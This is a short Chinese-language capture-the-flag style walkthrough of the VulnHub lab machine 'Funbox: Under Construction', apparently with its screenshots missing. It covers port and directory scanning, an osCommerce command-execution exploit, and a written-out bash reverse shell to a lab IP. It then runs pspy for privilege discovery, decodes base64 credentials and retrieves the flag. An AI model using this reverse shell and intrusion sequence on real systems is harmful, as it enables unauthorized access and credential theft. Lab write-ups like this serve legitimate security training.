vulnhubFunbox:UnderConstruction

环境搭建：

Funbox: Under Construction! ~ VulnHub

漏洞复现：

探测靶机的IP地址

nmap进行探测靶机的服务和端口

 访问80端口

 dirb扫描目录，发现catalog目录

访问一下，发现是个oscommerce的网站

查看版本的漏洞，发现命令执行漏洞 

查看该文件，如果执行成功，会返回当前目录的文件

修改为靶机的IP

运行脚本

访问文件，得到回显

修改命令

bash -c "exec bash -i &>/dev/tcp/192.168.226.128/1111 <&1" 

查看全局变量，查看执行文件都没发现可以利用 

下载pspy64s

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

 kali开启python服务，靶机进行下载

修改权限，进行执行

发现会执行一个脚本文件

 发现一个base64语句

进行解密，发现账号密码

 切换用户登录，要升级shell模式，不然不可以切换用户

查看目录下的flag